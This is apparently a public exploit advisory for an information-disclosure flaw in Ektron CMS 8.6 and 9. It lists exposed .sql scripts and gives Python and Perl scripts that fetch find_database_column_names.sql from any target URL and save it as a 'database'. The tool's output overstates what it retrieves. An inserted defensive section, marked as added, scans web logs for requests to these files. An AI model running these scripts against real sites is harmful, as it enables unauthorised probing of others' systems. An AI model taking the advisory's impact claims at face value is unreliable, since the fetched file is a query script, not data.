Ektron CMS 9 Database Disclosure

Posted Apr 2, 2019
Authored by KingSkrupellos

Ektron CMS version 9 suffers from a database disclosure vulnerability.

tags | exploit, info disclosure
SHA-256 | c1e6b5468aa8ebee02d5abf2d30f6de55b014366e5af655117a090a95398bcd7

###########################################################################

# Exploit Title : Ektron CMS 9 Database Disclosure Exploit
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 02/04/2019
# Vendor Homepage : ektron.com
episerver.com/products/platform/ektron/
# Software Download Link : github.com/whanrott/Ektron_sql_scripts/archive/master.zip
# Software Information Link : ektron.com/Products/Web-CMS/Web-Content-Management/
github.com/whanrott/Ektron_sql_scripts
cmsmatrix.org/matrix/cms-matrix/ektron-cms
# Software Affected Versions : 8.6 and 9
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###########################################################################

# Description about Software :
***************************
Ektron Web Content Management System (CMS) is the platform of choice for more than 3,700 global companies.

Episerver Digital Experience Cloud™ The only platform that puts Digital Content, Commerce and Marketing in one screen.

Create, deploy, and manage enterprise-scale, global, personalized websites. Empower users, designers, and developers to work in parallel, speeding time-to-web. Make content updates directly on the site using an intuitive browser-based editor. Create site wireframes, ensuring global brand consistency. Speed development using Ektron's Framework API, pre-built .NET controls, and standard development tools like Microsoft Visual Studio.

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.

* This information is highly sensitive and should not be found on a production system.

Information :
*************
Ektron SQL Scripts :

Simple SQL scripts for examining the database of Ektron CMS v9.

Scripts :

Script Name                       Purpose
find_all_users.sql                List all users with last login date
find_content_and_folder.sql       List all content, showing folder. Filter by multiple criteria
find_content_history.sql          Show content item history
find_database_column_names.sql    Query the database structure to find matching tables and column names
find_folder_permissions.sql       List folder permissions

###########################################################################

Files :
*****
/find_all_users.sql
/find_content_alias_and_template.sql
/find_content_and_folder.sql
/find_content_history.sql
/find_database_column_names.sql
/find_folder_permissions.sql
/find_menu_items.sql
/find_meta_course_accreditation.sql
/find_meta_course_combinations.sql
/find_mismatched_content.sql
/where_is_this_content_used.sql
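
To check whether any of the scripts listed above were requested or served from a site, the web server's access log can be searched for them. The following is an added example, not part of the original advisory: it assumes IIS W3C-format logs with a `#Fields:` directive, and the function names and the sample log are constructed for illustration.

```python
# File names taken from the advisory's "Files" list.
SQL_SCRIPTS = {
    "find_all_users.sql", "find_content_alias_and_template.sql",
    "find_content_and_folder.sql", "find_content_history.sql",
    "find_database_column_names.sql", "find_folder_permissions.sql",
    "find_menu_items.sql", "find_meta_course_accreditation.sql",
    "find_meta_course_combinations.sql", "find_mismatched_content.sql",
    "where_is_this_content_used.sql",
}

# Constructed sample log (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2019-04-03 10:01:12 198.51.100.7 GET /index.aspx - 200
2019-04-03 10:01:15 203.0.113.9 GET /find_database_column_names.sql - 200
2019-04-03 10:01:16 203.0.113.9 GET /cms/Find_All_Users.SQL - 404
2019-04-03 10:02:40 203.0.113.9 GET /cms/find_all_users.sql - 200
2019-04-03 10:03:02 198.51.100.7 GET /docs/notes.sql.txt - 200
2019-04-03 10:04:55 192.0.2.44 GET /backup/schema.sql - 200
"""

def find_sql_script_hits(log_text):
    """Return one dict per request whose last path segment ends in .sql."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column order may change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        path = row.get("cs-uri-stem", "")
        name = path.rsplit("/", 1)[-1].lower()   # IIS paths are case-insensitive
        if not name.endswith(".sql"):
            continue
        status = row.get("sc-status", "")
        hits.append({
            "client": row.get("c-ip"), "path": path,
            "status": int(status) if status.isdigit() else 0,
            "served": status.startswith("2"),        # 2xx: the file went out
            "advisory_name": name in SQL_SCRIPTS,    # name listed in the advisory
        })
    return hits

def served_by_client(hits):
    """Group the .sql paths that were actually served, keyed by client IP."""
    out = {}
    for h in (h for h in hits if h["served"]):
        out.setdefault(h["client"], []).append(h["path"])
    return out
```

A served (2xx) hit means the file left the server; removing the scripts from the web root or blocking the `.sql` extension at the web server closes the exposure.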

Information [ find_database_column_names.sql ]
*********************************************
/* look for table column names */

--USE <database name>;

SELECT
TABLE_NAME
,COLUMN_NAME
,DATA_TYPE
,CHARACTER_MAXIMUM_LENGTH
FROM
INFORMATION_SCHEMA.COLUMNS
WHERE
-- COLUMN_NAME LIKE '%%'
--AND TABLE_NAME LIKE '%_tbl'
--AND (TABLE_NAME LIKE '%%' OR COLUMN_NAME LIKE '%template%')
--AND
(
COLUMN_NAME LIKE '%%' OR TABLE_NAME LIKE '%%'
)
AND COLUMN_NAME LIKE '%%'
AND TABLE_NAME NOT LIKE '%_tracking'
ORDER BY
TABLE_NAME, COLUMN_NAME
;

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/find_database_column_names.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('Ektron CMS V.9 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="find_database_column_names.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/find_database_column_names.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/find_database_column_names.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###########################################################################